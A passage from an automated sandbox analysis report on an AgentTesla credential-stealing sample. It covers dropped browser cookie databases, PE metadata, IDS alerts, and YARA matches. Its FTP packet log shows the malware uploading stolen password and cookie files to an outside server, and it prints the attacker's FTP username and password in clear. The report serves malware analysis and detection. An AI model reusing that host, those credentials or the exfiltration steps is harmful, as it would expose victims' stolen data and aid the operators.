C:\Users\user\AppData\Roaming\2tgxmjqc.5kz\Chrome\Default\Network\Cookies

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\2tgxmjqc.5kz\Edge Chromium\Default\Network\Cookies

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\2tgxmjqc.5kz\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	modified
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.165455898902739
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	umVoLahqZn.exe
File size:	832'000 bytes
MD5:	6142aad778dc57ae2ecfe036c2d11c4e
SHA1:	73d3b45ab4812f445b6cf1c58ea7b7fdf47295a8
SHA256:	325f8b7cb5f2bd3c93b6052bc44407c878feef638ed6303b9385185b05ac3f67
SHA512:	5f4fd5212843e106ce21bebcc0776bb8647cd83de9a07e9b50ac6bbec72947b5eb288ba12a19685e9c238bc69ee4b8133fd05e7cf5797b40db2fb0269480ec3b
SSDEEP:	12288:mB3yuZG8+De1kIse8LRWjrZCollIoNE8kzZu3vvK541rs:mB3yuZGVteKRyjl6ik1Cvvy41rs
TLSH:	7C05F05903FC9EA0F67E2BB6C5B212044B75B4077872E35D468090FB5E72BE1D992B23
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....e.B............................N.... ........@.. ....................... ............`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4cc94e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x42B065FA [Wed Jun 15 17:31:38 2005 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xcc8fc	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xce000	0x3f8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd0000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xca954	0xcaa00	d2e3b86491d71694fcb1bf8fc7060021	False	0.7661081604719309	data	7.173088295592971	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xce000	0x3f8	0x400	936889baeeb8b201b00afcd100017fd7	False	0.4375	data	3.4785471698328942	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xd0000	0xc	0x200	ca4b8c4d23f3f280dfa900dc4853fbf3	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xce058	0x3a0	data			0.4482758620689655

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-05T17:19:03.339168+0100	2029927	ET MALWARE AgentTesla Exfil via FTP	1	192.168.2.5	49823	162.241.203.30	21	TCP
2024-12-05T17:19:04.266946+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.5	49830	162.241.203.30	49139	TCP
2024-12-05T17:19:04.387388+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.5	49830	162.241.203.30	49139	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 5, 2024 17:18:59.838640928 CET	49823	21	192.168.2.5	162.241.203.30
Dec 5, 2024 17:18:59.958595037 CET	21	49823	162.241.203.30	192.168.2.5
Dec 5, 2024 17:18:59.959754944 CET	49823	21	192.168.2.5	162.241.203.30
Dec 5, 2024 17:19:01.104043961 CET	21	49823	162.241.203.30	192.168.2.5
Dec 5, 2024 17:19:01.104264021 CET	49823	21	192.168.2.5	162.241.203.30
Dec 5, 2024 17:19:01.224479914 CET	21	49823	162.241.203.30	192.168.2.5
Dec 5, 2024 17:19:01.436093092 CET	21	49823	162.241.203.30	192.168.2.5
Dec 5, 2024 17:19:01.438261032 CET	49823	21	192.168.2.5	162.241.203.30
Dec 5, 2024 17:19:01.558074951 CET	21	49823	162.241.203.30	192.168.2.5
Dec 5, 2024 17:19:01.876823902 CET	21	49823	162.241.203.30	192.168.2.5
Dec 5, 2024 17:19:01.877048969 CET	49823	21	192.168.2.5	162.241.203.30
Dec 5, 2024 17:19:01.996876955 CET	21	49823	162.241.203.30	192.168.2.5
Dec 5, 2024 17:19:02.210906029 CET	21	49823	162.241.203.30	192.168.2.5
Dec 5, 2024 17:19:02.211105108 CET	49823	21	192.168.2.5	162.241.203.30
Dec 5, 2024 17:19:02.331249952 CET	21	49823	162.241.203.30	192.168.2.5
Dec 5, 2024 17:19:02.545950890 CET	21	49823	162.241.203.30	192.168.2.5
Dec 5, 2024 17:19:02.546293974 CET	49823	21	192.168.2.5	162.241.203.30
Dec 5, 2024 17:19:02.666296959 CET	21	49823	162.241.203.30	192.168.2.5
Dec 5, 2024 17:19:02.878377914 CET	21	49823	162.241.203.30	192.168.2.5
Dec 5, 2024 17:19:02.878551006 CET	49823	21	192.168.2.5	162.241.203.30
Dec 5, 2024 17:19:03.000718117 CET	21	49823	162.241.203.30	192.168.2.5
Dec 5, 2024 17:19:03.213762999 CET	21	49823	162.241.203.30	192.168.2.5
Dec 5, 2024 17:19:03.215712070 CET	49830	49139	192.168.2.5	162.241.203.30
Dec 5, 2024 17:19:03.266058922 CET	49823	21	192.168.2.5	162.241.203.30
Dec 5, 2024 17:19:03.335434914 CET	49139	49830	162.241.203.30	192.168.2.5
Dec 5, 2024 17:19:03.335530043 CET	49830	49139	192.168.2.5	162.241.203.30
Dec 5, 2024 17:19:03.339168072 CET	49823	21	192.168.2.5	162.241.203.30
Dec 5, 2024 17:19:03.459573984 CET	21	49823	162.241.203.30	192.168.2.5
Dec 5, 2024 17:19:04.266601086 CET	21	49823	162.241.203.30	192.168.2.5
Dec 5, 2024 17:19:04.266946077 CET	49830	49139	192.168.2.5	162.241.203.30
Dec 5, 2024 17:19:04.266997099 CET	49830	49139	192.168.2.5	162.241.203.30
Dec 5, 2024 17:19:04.312911034 CET	49823	21	192.168.2.5	162.241.203.30
Dec 5, 2024 17:19:04.386799097 CET	49139	49830	162.241.203.30	192.168.2.5
Dec 5, 2024 17:19:04.387288094 CET	49139	49830	162.241.203.30	192.168.2.5
Dec 5, 2024 17:19:04.387387991 CET	49830	49139	192.168.2.5	162.241.203.30
Dec 5, 2024 17:19:04.606192112 CET	21	49823	162.241.203.30	192.168.2.5
Dec 5, 2024 17:19:04.656681061 CET	49823	21	192.168.2.5	162.241.203.30
Dec 5, 2024 17:19:04.669147968 CET	49823	21	192.168.2.5	162.241.203.30
Dec 5, 2024 17:19:04.789369106 CET	21	49823	162.241.203.30	192.168.2.5
Dec 5, 2024 17:19:05.001497984 CET	21	49823	162.241.203.30	192.168.2.5
Dec 5, 2024 17:19:05.001996040 CET	49835	49101	192.168.2.5	162.241.203.30
Dec 5, 2024 17:19:05.047343016 CET	49823	21	192.168.2.5	162.241.203.30
Dec 5, 2024 17:19:05.122826099 CET	49101	49835	162.241.203.30	192.168.2.5
Dec 5, 2024 17:19:05.122952938 CET	49835	49101	192.168.2.5	162.241.203.30
Dec 5, 2024 17:19:05.123049974 CET	49823	21	192.168.2.5	162.241.203.30
Dec 5, 2024 17:19:05.243083000 CET	21	49823	162.241.203.30	192.168.2.5
Dec 5, 2024 17:19:06.052539110 CET	21	49823	162.241.203.30	192.168.2.5
Dec 5, 2024 17:19:06.052753925 CET	49835	49101	192.168.2.5	162.241.203.30
Dec 5, 2024 17:19:06.052753925 CET	49835	49101	192.168.2.5	162.241.203.30
Dec 5, 2024 17:19:06.094165087 CET	49823	21	192.168.2.5	162.241.203.30
Dec 5, 2024 17:19:06.176517963 CET	49101	49835	162.241.203.30	192.168.2.5
Dec 5, 2024 17:19:06.176543951 CET	49101	49835	162.241.203.30	192.168.2.5
Dec 5, 2024 17:19:06.176656961 CET	49101	49835	162.241.203.30	192.168.2.5
Dec 5, 2024 17:19:06.177159071 CET	49101	49835	162.241.203.30	192.168.2.5
Dec 5, 2024 17:19:06.177208900 CET	49835	49101	192.168.2.5	162.241.203.30
Dec 5, 2024 17:19:06.389560938 CET	21	49823	162.241.203.30	192.168.2.5
Dec 5, 2024 17:19:06.437948942 CET	49823	21	192.168.2.5	162.241.203.30

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 5, 2024 17:18:59.686371088 CET	58812	53	192.168.2.5	1.1.1.1
Dec 5, 2024 17:18:59.825875998 CET	53	58812	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 5, 2024 17:18:59.686371088 CET	192.168.2.5	1.1.1.1	0xb932	Standard query (0)	ftp.aminhacorretora.com.br	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 5, 2024 17:18:59.825875998 CET	1.1.1.1	192.168.2.5	0xb932	No error (0)	ftp.aminhacorretora.com.br	aminhacorretora.com.br		CNAME (Canonical name)	IN (0x0001)	false
Dec 5, 2024 17:18:59.825875998 CET	1.1.1.1	192.168.2.5	0xb932	No error (0)	aminhacorretora.com.br		162.241.203.30	A (IP address)	IN (0x0001)	false

FTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Dec 5, 2024 17:19:01.104043961 CET	21	49823	162.241.203.30	192.168.2.5	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 150 allowed.220-Local time is now 13:19. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 150 allowed.220-Local time is now 13:19. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 150 allowed.220-Local time is now 13:19. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Dec 5, 2024 17:19:01.104264021 CET	49823	21	192.168.2.5	162.241.203.30	USER logsftp@aminhacorretora.com.br
Dec 5, 2024 17:19:01.436093092 CET	21	49823	162.241.203.30	192.168.2.5	331 User logsftp@aminhacorretora.com.br OK. Password required
Dec 5, 2024 17:19:01.438261032 CET	49823	21	192.168.2.5	162.241.203.30	PASS _yA=,M5*J?KH
Dec 5, 2024 17:19:01.876823902 CET	21	49823	162.241.203.30	192.168.2.5	230 OK. Current restricted directory is /
Dec 5, 2024 17:19:02.210906029 CET	21	49823	162.241.203.30	192.168.2.5	504 Unknown command
Dec 5, 2024 17:19:02.211105108 CET	49823	21	192.168.2.5	162.241.203.30	PWD
Dec 5, 2024 17:19:02.545950890 CET	21	49823	162.241.203.30	192.168.2.5	257 "/" is your current location
Dec 5, 2024 17:19:02.546293974 CET	49823	21	192.168.2.5	162.241.203.30	TYPE I
Dec 5, 2024 17:19:02.878377914 CET	21	49823	162.241.203.30	192.168.2.5	200 TYPE is now 8-bit binary
Dec 5, 2024 17:19:02.878551006 CET	49823	21	192.168.2.5	162.241.203.30	PASV
Dec 5, 2024 17:19:03.213762999 CET	21	49823	162.241.203.30	192.168.2.5	227 Entering Passive Mode (162,241,203,30,191,243)
Dec 5, 2024 17:19:03.339168072 CET	49823	21	192.168.2.5	162.241.203.30	STOR PW_user-367706_2024_12_05_11_18_58.html
Dec 5, 2024 17:19:04.266601086 CET	21	49823	162.241.203.30	192.168.2.5	150 Accepted data connection
Dec 5, 2024 17:19:04.606192112 CET	21	49823	162.241.203.30	192.168.2.5	226-File successfully transferred 226-File successfully transferred226 0.333 seconds (measured here), 0.94 Kbytes per second
Dec 5, 2024 17:19:04.669147968 CET	49823	21	192.168.2.5	162.241.203.30	PASV
Dec 5, 2024 17:19:05.001497984 CET	21	49823	162.241.203.30	192.168.2.5	227 Entering Passive Mode (162,241,203,30,191,205)
Dec 5, 2024 17:19:05.123049974 CET	49823	21	192.168.2.5	162.241.203.30	STOR CO_user-367706_2024_12_05_11_19_03.zip
Dec 5, 2024 17:19:06.052539110 CET	21	49823	162.241.203.30	192.168.2.5	150 Accepted data connection
Dec 5, 2024 17:19:06.389560938 CET	21	49823	162.241.203.30	192.168.2.5	226-File successfully transferred 226-File successfully transferred226 0.337 seconds (measured here), 9.93 Kbytes per second

Target ID:	0
Start time:	11:17:51
Start date:	05/12/2024
Path:	C:\Users\user\Desktop\umVoLahqZn.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\umVoLahqZn.exe"
Imagebase:	0x10000
File size:	832'000 bytes
MD5 hash:	6142AAD778DC57AE2ECFE036C2D11C4E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2724787687.00000000043E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.2724787687.00000000043E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.2724787687.000000000455E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2724787687.000000000462F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.2724787687.000000000462F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2726127716.0000000005A70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2713909861.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	11:18:24
Start date:	05/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0xfb0000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000002.3309819183.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3312331855.0000000003381000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3312331855.0000000003381000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	17.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	8.1%
Total number of Nodes:	86
Total number of Limit Nodes:	7

Executed Functions

Function 07C306E0 Relevance: 9.6, Strings: 7, Instructions: 837
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Haq, xrefs: 07C30B52
Haq, xrefs: 07C30D70
PH]q, xrefs: 07C30881
Haq, xrefs: 07C30F74
(aq, xrefs: 07C308AD
Haq, xrefs: 07C30BB1
Haq, xrefs: 07C30FD3

Memory Dump Source

Source File: 00000000.00000002.2727896490.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c30000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: (aq$Haq$Haq$Haq$Haq$Haq$PH]q
API String ID: 0-1308128955
Opcode ID: 39cb9ce3299b22c31d268d4cafa3111eb1f16dd9743339fa52ed77892259b46b
Instruction ID: b129c03d9bb8b43884092758eeddccccd4e5cd3cfab0c1f13e9ad73fa04856c1
Opcode Fuzzy Hash: 39cb9ce3299b22c31d268d4cafa3111eb1f16dd9743339fa52ed77892259b46b
Instruction Fuzzy Hash: 1552DD717002158FCB58AF39C894A6E7BA7BF89310F1485A9E406DB3A5CF34DD46C7A1

Function 07CB401E Relevance: 6.8, Strings: 3, Instructions: 3074
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

G, xrefs: 07CB4038
@, xrefs: 07CB7494
@, xrefs: 07CB7484

Memory Dump Source

Source File: 00000000.00000002.2728075415.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7cb0000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: @$@$G
API String ID: 0-3628805992
Opcode ID: f078da427ce5408eb9c23271af7a6243bdf3a4aedb377292a935bdfbec8c3ffc
Instruction ID: 293bee86b3e876d9a2041934d9de8f820f8fc830ad324cf0bdd2d8b737a09489
Opcode Fuzzy Hash: f078da427ce5408eb9c23271af7a6243bdf3a4aedb377292a935bdfbec8c3ffc
Instruction Fuzzy Hash: 60538DB0E152698BCB24EF78DC8976DBBB5EB89304F4044EAD448B7240DE386D85CF56

Function 01538370 Relevance: 6.7, Strings: 5, Instructions: 442
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,aq, xrefs: 01538632
(o]q, xrefs: 015385BA
,aq, xrefs: 01538640
(o]q, xrefs: 015385C8
(o]q, xrefs: 015388E5

Memory Dump Source

Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$(o]q$,aq$,aq
API String ID: 0-615190528
Opcode ID: cfd9e4f5d72c187bef2fc289e86425d162d2fdee17755b8f778722bb6d6452ae
Instruction ID: c8ae3aa8e635a17b1b5fd02cbc5dd0321aed8cf7a22585c48c9548a629d75c26
Opcode Fuzzy Hash: cfd9e4f5d72c187bef2fc289e86425d162d2fdee17755b8f778722bb6d6452ae
Instruction Fuzzy Hash: 9A024B70A00209DFDB19CF69D884AAEBBF6FF88300F188669F505AB365D731E951CB50

Function 07C54535 Relevance: 5.5, Instructions: 5517
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2727988329.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c50000_umVoLahqZn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d88b63bd0851df776dea69e9bec91807c66cfe52914dac7327405783e5cf0e87
Instruction ID: 757bfc64ac4d9b362e8f7fbe6c4298f80070fcf92b9b5ba1c9e79671c54f132a
Opcode Fuzzy Hash: d88b63bd0851df776dea69e9bec91807c66cfe52914dac7327405783e5cf0e87
Instruction Fuzzy Hash: 1CB30470E017298FCB28EF39D9896ACBBB2BB89305F4095E9D049A7350DB355D85CF42

Function 07C54560 Relevance: 5.5, Instructions: 5499
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2727988329.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c50000_umVoLahqZn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c17def8d611b205958ca028663df5b8921130db1cfd9dd09dc2691014de4cd72
Instruction ID: b424ebb38ea35102bb7d73bf4450d545d04384d9c7baaef2caf68644142f8876
Opcode Fuzzy Hash: c17def8d611b205958ca028663df5b8921130db1cfd9dd09dc2691014de4cd72
Instruction Fuzzy Hash: 8AB30470E017298FCB28EF39D9896ACBBB2BB89305F4095E9D049A7350DB355D85CF42

Function 07C34A58 Relevance: 5.2, Instructions: 5237
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2727896490.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c30000_umVoLahqZn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f57cf8ee7df6fc9f50bb001ff553133453461d3560f045985c753e0e76cc99e8
Instruction ID: 4569dfa010aacd5807a5faa141bdedfbc32066323302eb5b32348449846b7e0f
Opcode Fuzzy Hash: f57cf8ee7df6fc9f50bb001ff553133453461d3560f045985c753e0e76cc99e8
Instruction Fuzzy Hash: 58B3E870A1121A8FCB58EF39E98966CBBF2FB88304F4085E9D488A7250DF345D95DF85

Function 07E2C1D8 Relevance: 5.2, Strings: 4, Instructions: 190
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

e\1, xrefs: 07E2C2CC
e\1, xrefs: 07E2C2C5
"*p, xrefs: 07E2C327
"*p, xrefs: 07E2C310

Memory Dump Source

Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: e\1$e\1$"*p$"*p
API String ID: 0-1513742261
Opcode ID: 87e7359f323dedb865ff8b001a8155370d7c4887b2d734647673ec7100522281
Instruction ID: cc248d71f03286f777c493d897c355e55a8f7c502f0e70966ebd54fe2cc3b96a
